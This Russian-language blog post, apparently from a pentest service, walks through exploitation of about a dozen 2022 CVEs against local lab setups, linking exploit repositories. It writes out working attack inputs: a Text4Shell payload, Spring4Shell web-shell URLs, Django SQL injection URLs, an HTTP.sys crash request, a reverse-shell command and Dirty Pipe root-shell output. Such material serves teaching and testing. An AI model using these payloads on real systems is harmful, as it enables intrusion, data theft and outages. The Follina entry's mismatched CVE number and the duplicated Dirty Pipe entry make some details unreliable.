17 Янв, 2023

ТОП-12 CVE для Пентеста в 2022

Penetration Testing as a service (PTaaS)

Tests security measures and simulates attacks to identify weaknesses.

What is CVE or Common Vulnerabilities and Exposures?

CVE (англ. Common Vulnerabilities and Exposures) — общедоступная и бесплатная для использования база данных / глоссарий раскрытых вопросов кибербезопасности и их классификации. Эта база данных поддерживается MITRE, корпорацией финансируемой на средства Министерства внутренней безопасности США.

Каждая уязвимость имеет уникальный идентификатор, оценку и список в глоссарии MITRE. Это было сделано для унификации коммуникации между отраслями безопасности и технологий, которые теперь могут ссылаться на этот стандарт.

В глоссарии используется Общая система оценки уязвимостей (англ. Common Vulnerability Scoring System) или CVSS для оценки серьезности или уровня угрозы уязвимости. Почему? Нам нужно понять, какой ущерб мы можем получить от той или иной проблемы безопасности, а затем расставить приоритеты. Оценка зависит не только от технологии, но и от бизнес-структуры компании.

Top 10 detected threats for month in Ukraine ( (источник) )

1  Multi.Desert.gen 16,67%
2 Win32.ShadowBrokers.ae 8,89%
3 IphoneOS.Vortex.a 7,41%
4 EMSOffce.CVE-2018-0802.gen 5,19%
5 AndroidOS.Psneuter.a 4,81%
6 Win32.Agent.gen 4,81%
7 AndroidOS.Lotoor.cd 3,70%
8 AndroidOS.Lotoor.bm 3,70%
9 Win32.ShadowBrokers.aa 2,96%
10 Java.CVE-2013-1493.x 2,96%

CVE-2022-0847

Уровень важности Высокий : эскалация привилегий в ядре Linux

Уязвимость позволяет локальному пользователю повысить привилегии в системе. Уязвимость существует из-за использования неинициализированных ресурсов. Локальный пользователь может перезаписать произвольный файл в кэше страниц, даже если файл доступен только для чтения, и выполнить произвольный код на системе с повышенными привилегиями. Уязвимость получила название Dirty Pipe. Затронуты версии ядра Linux новее 5.8.

На данный момент уязвимость была устранена в следующих компонентах Linux kernel версий 5.16.11 / 5.15.25 / 5.10.102

Эксплуатация

Клонируйте репозиторий и следуйте инструкциям по компиляции эксплойта:

https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits.git

 

Usage exploit-1 : непривилегированный пользователь может изменить пароль root на "piped".

Для Linux 5.18.0 (которая не является уязвимой):

Для Linux 5.11.0 (которая уязвима):

Обратите внимание!

Также есть сканнер для CVE-2022-0847. Просто показывает, уязвима ли версия ядра Kali или нет.

https://github.com/basharkey/CVE-2022-0847-dirty-pipe-checker

Usage exploit-2 Вы можете внедрять и перезаписывать данные в доступную только для чтения память процессов SUID, запущенных от имени root.

Для Linux 5.18.0 (которая не является уязвимой):

Для Linux 5.11.0 (которая уязвима):

[+] hijacking suid binary..

[+] dropping suid shell..

[+] restoring suid binary..

[+] pooping root shell..

#id

uid=0(root) gid=0(root) groups=0(root), 1001(developer)

Источники:

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0847

https://dirtypipe.cm4all.com/

https://www.cybersecurity-help.cz/vdb/SB2022030808

CVE-2022-0190

Уровень важности Критический : дистанционное выполнение кода в Microsoft Windows

Уязвимость позволяет удаленному злоумышленнику выполнить произвольные команды shell на целевой системе. Уязвимость существует из-за неправильной проверки ввода при обработке URL в Microsoft Windows Support Diagnostic Tool (MSDT). Удаленный неаутентифицированный злоумышленник может обманом заставить жертву загрузить (например, из электронной почты) и открыть специально созданный файл, который вызывает инструмент ms-msdt и выполняет произвольные команды ОС на целевой системе. Успешная эксплуатация этой уязвимости может привести к полной дезорганизации работы системы.

Эксплуатация

Клонируйте репозиторий и следуйте инструкциям по компиляции эксплойта:

https://github.com/JohnHammond/msdt-follina.git

Использование

Info:

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30190

https://nvd.nist.gov/vuln/detail/CVE-2022-30190

https://www.cybersecurity-help.cz/vdb/SB2022053005

CVE-2022-0482

Уровень важности Критический : раскрытие конфиденциальных данных в Easyappointments 1.4.3 

Эта уязвимость позволяет раскрыть частную личную информацию неавторизованному актору в репозитории GitHub alextselegidis/easyappointments до версии 1.4.3.

Эксплуатация 

Клонируйте репозиторий и следуйте инструкциям по компиляции эксплойта:

https://github.com/Acceis/exploit-CVE-2022-0482  

Использование 

Уязвимый сайт размещен на локальном хосте, и вся его база данных, включая имя пользователя, пароль и другие PII-данные пользователей, выгружается.

Источники:

https://nvd.nist.gov/vuln/detail/CVE-2022-0482 

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0482 

https://packetstormsecurity.com/files/166701/Easy-Appointments-Information-Disclosure.html 

CVE-2022-26134

Уровень важности Критический Injection in Atlassian Confluence

Confluence - это система совместного документирования и управления проектами для команд. Она помогает отслеживать статус проекта, предлагая централизованное рабочее пространство для участников. Этот CVE использует уязвимость инъекции в языке выражения OGNL (Object-Graph Navigation Language) для Java, которая позволяет неавторизованному злоумышленнику выполнить произвольный код. OGNL используется для получения и установки свойств объектов Java, а также для многих других целей.

Эксплуатация
 

Клонируйте репозиторий и следуйте инструкциям по компиляции эксплойта:

https://github.com/h3v0x/CVE-2022-26134  

Использование 

В качестве уязвимой среды используется Atlassian Confluence 7.3.5. Неаутентифицированный пользователь может выполнить произвольные коды.

Источники: 

https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html  

https://nvd.nist.gov/vuln/detail/cve-2022-26134  

CVE-2022-0847 

Уровень важности Высокий эскалация привилегий в ядре Linux 

Уязвимость в ядре Linux начиная с версии 5.8, которая позволяет перезаписывать данные в произвольных файлах, доступных только для чтения. Это приводит к увеличению привилегий, поскольку непривилегированные процессы могут внедрить код в корневые процессы.

Эксплуатация

Клонируйте репозиторий и следуйте инструкциям по компиляции эксплойта:

https://github.com/arttnba3/CVE-2022-0847

Использование

1 Создайте хэш SHA512Crypt выбранного вами пароля с помощью команды openssl passwd -6 –salt THM “PASSWORD”

2 Скомпилируйте эксплойт, используя команду gcc poc.c -o exploit

3 Запустите эксплойт для добавления пользователя root в файл passwd:

Источники: 

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0847  

https://nvd.nist.gov/vuln/detail/CVE-2022-0847  

https://tryhackme.com/room/dirtypipe  

CVE-2022-33891

Уровень важности Высокий Уязвимость введения команд в оболочку Apache Spark Shell

Apache Spark UI предоставляет возможность включить ACL с помощью параметра конфигурации spark.acls.enable. С помощью фильтра аутентификации проверяется, имеет ли пользователь права доступа для просмотра или изменения приложения. Если ACL включены, путь кода в HttpSecurityFilter может позволить кому-то выполнить самозванство, предоставив произвольное имя пользователя. Затем злоумышленник может получить доступ к функции проверки разрешений, которая в конечном итоге создаст команду оболочки Unix на основе его ввода и выполнит ее. Это приведет к выполнению произвольной команды shell пользователем, от имени которого в данный момент работает Spark.

Это касается версий Apache Spark 3.0.3. и более ранних, версий с 3.1.1 по 3.1.2, а также версий с 3.2.0 по 3.2.1.

Эксплуатация 

Клонируйте репозиторий и следуйте инструкциям по компиляции эксплойта:

https://github.com/HuskyHacks/cve-2022-33891 

Usage exploit-1 Проверьте, является ли сервер уязвимым: python3 poc.py -u http://localhost -p 8080 –check –verbose   

Для уязвимых целей:

Для неуязвимых целей:

Usage exploit-2 You can use the poc to obtain reverse shell

python3 poc.py -u http://localhost -p 8080 –revshell -lh <IP> -lp <PORT> –verbose 

Для уязвимых целей:

Источники: 

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-33891  

https://packetstormsecurity.com/files/168309/Apache-Spark-Unauthenticated-Command-Injection.html 

https://lists.apache.org/thread/p847l3kopoo5bjtmxrcwk21xp6tjxqlc  

CVE-2022-22965 

Уровень важности Критический Spring4Shell – Spring Core RCE 

Приложение Spring MVC или Spring WebFlux, работающее на JDK 9+ может быть уязвимо к удаленному выполнению кода (RCE) через привязку данных. Конкретный эксплойт требует, чтобы приложение работало на платформе Tomcat как развертывание WAR. Если приложение развернуто как исполняемый jar Spring Boot, т.е. по умолчанию, оно не уязвимо для эксплойта. Однако природа уязвимости более общая, и могут существовать другие способы ее использования.

Эксплуатация 

Запустите уязвимый docker-образ Spring с помощью команды:

docker run -d -p 8082:8080 –name springrce -it vulfocus/spring-core-rce-2022-03-29 

Это привязывает уязвимый Spring к адресу localhost:8082. Посетите http://localhost:8082 чтобы проверить

Колнируйте эксплойт из https://github.com/TheGejr/SpringShell и выполните следующую команду, чтобы проверить, является ли сервер уязвимым

python3 exp.py –url http://localhost:8082 

Теперь вы можете использовать эту уязвимость, зайдя по адресу shell и изменив значение параметра cmd.

a) Для url: http://localhost:8082/tomcatwar.jsp?pwd=j&cmd=whoami, возвращается вывод whoami.

б) Для url: http://localhost:8082/tomcatwar.jsp?pwd=j&cmd=ls 

Источники:

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22965  

https://packetstormsecurity.com/files/167011/Spring4Shell-Spring-Framework-Class-Property-Remote-Code-Execution.html  

https://www.oracle.com/security-alerts/cpuapr2022.html  

CVE-2022-42889 

Уровень важности Критический Apache commons-text vulnerability

Apache Commons Text выполняет интерполяцию переменных, позволяя динамически оценивать и расширять свойства. Стандартным форматом для интерполяции является “${prefix:name}”, где " prefix" используется для определения местоположения экземпляра org.apache.commons.text.lookup.StringLookup который выполняет интерполяцию. Начиная с версии 1.5 и до версии 1.9, набор экземпляров Lookup по умолчанию включал интерполяторы, которые могли привести к выполнению произвольного кода или контакту с удаленными серверами.

Этими запросами являются: - "script" - выполнение выражений с использованием механизма выполнения сценариев JVM (javax.script) - "dns" - разрешение записей dns - "url" - загрузка значений из урлов, в том числе с удаленных серверов Приложения, использующие интерполяцию по умолчанию в затронутых версиях, могут быть уязвимы для удаленного выполнения кода или непреднамеренного контакта с удаленными серверами, если используются недоверенные значения конфигурации. Затронуты версии Apache Commons Text с 1.5 по 1.9.

Эксплуатация 

Клонируйте хранилище и переместитесь в него https://github.com/akshayithape-devops/CVE-2022-42889-POC 

Создайте образ уязвимого приложения с помощью Docker:

docker build –tag=test/text4shell . 

Создайте контейнер и соберите образ: docker run -it -p 80:8080 -name text4shell test/text4l .

Откройте новую вкладку терминала и выполните следующую команду для входа в терминал веб-сервера docker exec -it text4shell /bin/bash

Перечислите все файлы в каталоге с помощью команды ls и увидите text4shell-poc.jar

Откройте новый порт. Сделайте запрос к веб-серверу. Атаку можно выполнить, передав строку "${префикс:имя}", где префикс - это вышеупомянутый поиск: ${script:javascript:java.lang.Runtime.getRuntime().exec('touch newfile.txt')}.

Например, следующая команда должна вызвать запрос на создание нового файла на сервере:

curl http://localhost/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20hello.txt%27%29%7D

Проверьте, создан ли файл на сервере, снова используя команду ls. Мы видим, что файл успешно создан. Это доказывает, что произвольное удаленное выполнение кода возможно.

bash-4.4# ls
text4shell-poc.jar
bash-4.4# ls
hello.txt  ⠀⠀⠀test4shell-poc.jar
bash-4.4#

Источники:

 

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42889 

https://www.openwall.com/lists/oss-security/2022/10/13/4 

https://lists.apache.org/thread/n2bd4vdsgkqh2tm14l1wyc3jyol7s1om 

 

 

CVE-2022-28346

Уровень важности Критический SQL injection Vulnerability in Django

Обнаружена уязвимость внедрения SQL в Django 2.2 до 2.2.28, 3.2 до 3.2.13 та 4.0 до 4.0.4..

Методы QuerySet.annotate(), aggregate() и extra() подвержены внедрению SQL в псевдонимы столбцов через поддельный словарь (с расширением словаря) в качестве переданных аргументов ключевых слов.

Эксплуатация

Клонируйте хранилище и следуйте инструкциям для запуска уязвимого сервера:

https://github.com/ahsentekdemir/CVE-2022-28346 

Usage exploit-1 Проверьте версию используемой базы данных sqlite:

http://127.0.0.1:8000/poc?field=poc.title%22%20FROM%20%22poc_blog%22%20union%20SELECT%20%22-1,%22,sqlite_version(),%223%22%20–

см. тест-1 3.39.4 в ответе

Usage exploit-2 Перечислите все таблицы базы данных sqlite

http://127.0.0.1:8000/poc?field=poc.title%22%20FROM%20%22poc_blog%22%20union%20SELECT%20%22-1,%22,tbl_name,%223%22%20FROM%20sqlite_master%20WHERE%20type=%27table%27%20and%20tbl_n

ame%20NOT%20like%20%27sqlite_%%27%20–

Источники:

 

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28346 

https://www.djangoproject.com/weblog/2022/apr/11/security-releases 

https://lists.debian.org/debian-lts-announce/2022/04/msg00013.html 

CVE-2022-21907

Уровень важности Критический Уязвимость удаленного выполнения кода в стеке протокола HTTP 

CVE-2022-21907 (CVSSv3 9.8) - это серьезный недостаток, затрагивающий стек протокола HTTP (HTTP.sys). HTTP.sys - это драйвер устройства ядра, присутствующий в текущих операционных системах Microsoft Windows, который отвечает за обработку HTTP-трафика в таких службах, как Microsoft IIS.

Из-за этой уязвимости злоумышленник может вызвать печально известный "синий экран смерти" на базовой машине, на которой установлен непропатченный драйвер HTTP.sys. Нарушения, которые может вызвать эта уязвимость, довольно серьезны, и хотя после одной атаки системы могут перезагрузиться и нормально функционировать, последующие атаки могут привести к полному отказу в обслуживании.

Эксплуатация

 

Чтобы воспроизвести этот эксплойт, необходимо включить IIS-сервер (в данном случае используется windows 10 версии 2004 (OS Build: 19041.329)) и открыть страницу сервера на localhost.

После завершения настройки получите IP-адрес хоста и запустите эту команду curl в терминале.

curl 192.168.0.164:80 -sH “Accept-encoding: 354429474810858105277502,753225473272192695969

091599085146218998458873428858279498120&68&**82302744837636557755**9,21204530472516

23940869443373783750655190662992171177571578371548748405709,035045705988280018190324

33815484769110241925758402724193417475718971298,895259892660286842061499776,***********

*****************267816, *, ,” 

После выполнения команды наблюдайте, что хост отключился с появлением синего экрана смерти.

Этот Poc также может быть воспроизведен с помощью Git Repo: https://github.com/ZZ-SOCMAP/CVE-2022-21907

Использование

 

Источники:

 

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21907

https://nvd.nist.gov/vuln/detail/CVE-2022-21907

https://github.com/ZZ-SOCMAP/CVE-2022-21907

CVE-2022-21999

Уровень важности Высокий Windows Print Spooler Повышение привилегий уязвимости (LPE)

Уязвимость (CVE-2022-21999), имеющая оценку CVSS 7.8 (High), при успешной эксплуатации позволяет злоумышленнику получить повышенные права. Уязвимый exe-файл должен быть использован обычным пользователем, и должна быть выполнена команда в shell для повышения роли путем создания учетной записи администратора на хосте.

Эксплуатация

 

Для воспроизведения этой уязвимости. На хосте требуется обычная учетная запись пользователя, а затем пользователь может повысить привилегии, выполнив уязвимый exe для создания учетной записи администратора с паролем по умолчанию: "Passw0rd!".

Этот Poc также может быть воспроизведен с помощью Git Repo: https://github.com/ly4k/SpoolFool

Использование

 

Источники:

 

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21999

https://nvd.nist.gov/vuln/detail/CVE-2022-21999

https://github.com/ly4k/SpoolFool

CVE-2022-1388

Уровень важности Критический : F5 BIG-IP iControl REST уязвимость RCE эксплойт с использованием Java

Нераспознанные запросы могут обойти аутентификацию iControl REST. Эта уязвимость может позволить неаутентифицированному злоумышленнику, имеющему сетевой доступ к системе BIG-IP через порт управления и/или собственные IP-адреса, выполнить произвольные системные команды, создать или удалить файлы или отключить службы.

Эксплуатация

 

 

Как воспроизвести эту уязвимость. Git-репозиторий на хосте может быть использован для определения того, является ли хост уязвимым. В данном случае для выявления уязвимости используется уязвимый хост с запущенной службой BIG-IP.

Для определения степени серьезности здесь вводится произвольный код, и сервер успешно отправляет ответный сигнал с желаемым результатом без какого-либо механизма аутентификации.

Этот Poc также может быть воспроизведен с помощью Git Repo: https://github.com/Zeyad-Azima/CVE-2022-1388

Использование

 

 

Источники:

 

 

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1388

https://nvd.nist.gov/vuln/detail/CVE-2022-1388

https://github.com/Zeyad-Azima/CVE-2022-1388

Спасибо за внимание!

Другие Услуги

Готовы к безопасности?

Связаться с нами